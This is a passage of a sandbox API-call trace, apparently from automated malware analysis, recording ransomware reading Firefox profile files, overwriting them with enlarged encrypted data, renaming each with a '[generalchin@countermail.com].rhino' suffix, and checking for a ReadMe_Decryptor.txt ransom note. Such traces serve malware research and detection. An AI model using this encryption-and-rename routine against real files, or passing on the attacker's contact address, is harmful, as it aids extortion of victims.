hHeap=0x6d0000) returned 1 [0094.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0094.646] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x18000 [0094.646] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18120, nNumberOfBytesToLockHigh=0x0) returned 1 [0094.646] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.646] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0094.649] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.649] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x18000, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x18000, lpOverlapped=0x0) returned 1 [0094.660] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0094.660] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0094.660] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0094.660] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0094.660] GetLastError () returned 0x0 [0094.660] SetLastError (dwErrCode=0x0) [0094.660] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0094.660] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18023) returned 0x70a650 [0094.661] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0094.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x722680 [0094.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x722788 [0094.661] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722680 | out: hHeap=0x6d0000) returned 1 [0094.661] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0094.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0094.661] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0094.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0094.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0094.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0094.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0094.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0094.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0094.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0094.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0094.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0094.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0094.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0094.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0094.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0094.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0094.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0094.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0094.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0094.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0094.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0094.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0094.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x722680 [0094.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x722910 [0094.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722680 | out: hHeap=0x6d0000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x722a58 [0094.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722910 | out: hHeap=0x6d0000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x722c40 [0094.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722a58 | out: hHeap=0x6d0000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x722f10 [0094.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722c40 | out: hHeap=0x6d0000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x723348 [0094.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722f10 | out: hHeap=0x6d0000) returned 1 [0094.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x722910 [0094.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x723348 | out: hHeap=0x6d0000) returned 1 [0094.695] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x723278 [0094.696] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722910 | out: hHeap=0x6d0000) returned 1 [0094.696] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x724090 [0094.696] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x723278 | out: hHeap=0x6d0000) returned 1 [0094.696] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7255d0 [0094.696] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x724090 | out: hHeap=0x6d0000) returned 1 [0094.696] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x727598 [0094.696] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7255d0 | out: hHeap=0x6d0000) returned 1 [0094.697] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x722910 [0094.697] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x727598 | out: hHeap=0x6d0000) returned 1 [0094.697] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75ef78 [0094.698] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722910 | out: hHeap=0x6d0000) returned 1 [0094.698] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x72bfe8 [0094.699] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0094.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x73c0b8 [0094.701] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0094.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x781f78 [0094.705] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0094.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x23b0048 [0094.710] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0094.711] WriteFile (in: hFile=0xec, lpBuffer=0x23b0060*, nNumberOfBytesToWrite=0x18120, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0060*, lpNumberOfBytesWritten=0x2cfa04*=0x18120, lpOverlapped=0x0) returned 1 [0094.712] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0094.712] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18120, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0094.712] CloseHandle (hObject=0xec) returned 1 [0094.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0094.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x722910 [0094.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0094.714] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0094.722] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722910 | out: hHeap=0x6d0000) returned 1 [0094.722] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722788 | out: hHeap=0x6d0000) returned 1 [0094.722] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0094.722] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0094.722] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0094.722] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0094.722] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x75ef78 [0094.723] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0094.723] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.723] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0094.723] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0094.931] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x8d [0094.931] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1ad, nNumberOfBytesToLockHigh=0x0) returned 1 [0094.931] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.931] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0094.933] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.933] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x8d, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x8d, lpOverlapped=0x0) returned 1 [0094.933] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0094.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0094.933] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0094.933] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0094.934] GetLastError () returned 0x0 [0094.934] SetLastError (dwErrCode=0x0) [0094.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0094.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0094.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0094.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75ef78 [0094.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f080 [0094.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0094.934] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0094.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0094.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0094.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0094.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0094.934] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0094.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0094.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0094.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0094.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0094.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0094.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0094.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0094.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0094.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0094.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0094.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0094.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0094.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0094.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0094.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0094.935] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0094.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0094.936] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x75ef78 [0094.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0094.936] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1ad) returned 0x75f208 [0094.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0094.936] WriteFile (in: hFile=0xec, lpBuffer=0x75f208*, nNumberOfBytesToWrite=0x1ad, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75f208*, lpNumberOfBytesWritten=0x2cfa04*=0x1ad, lpOverlapped=0x0) returned 1 [0094.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0094.936] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1ad, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0094.936] CloseHandle (hObject=0xec) returned 1 [0094.937] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0094.937] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x75f208 [0094.937] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0094.938] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0094.939] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0094.939] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0094.939] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0094.939] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0094.939] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0094.939] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0094.939] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x75ef78 [0094.939] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0094.939] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.939] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0094.939] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0094.940] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x70000 [0094.940] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x70120, nNumberOfBytesToLockHigh=0x0) returned 1 [0094.940] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.940] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0094.943] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.943] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x70000, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x70000, lpOverlapped=0x0) returned 1 [0094.951] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0094.951] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0094.951] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0094.951] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0094.951] GetLastError () returned 0x0 [0094.952] SetLastError (dwErrCode=0x0) [0094.952] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0094.952] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70023) returned 0x24b0048 [0094.969] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0094.969] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x2520078 [0094.969] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x2520180 [0094.969] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2520078 | out: hHeap=0x6d0000) returned 1 [0094.969] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.969] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0094.969] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0094.969] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0094.969] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0094.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0094.970] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0094.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0094.970] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0094.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0094.970] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0094.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0094.970] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0094.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0094.970] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0094.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0094.970] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0094.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0094.970] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0094.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0094.970] 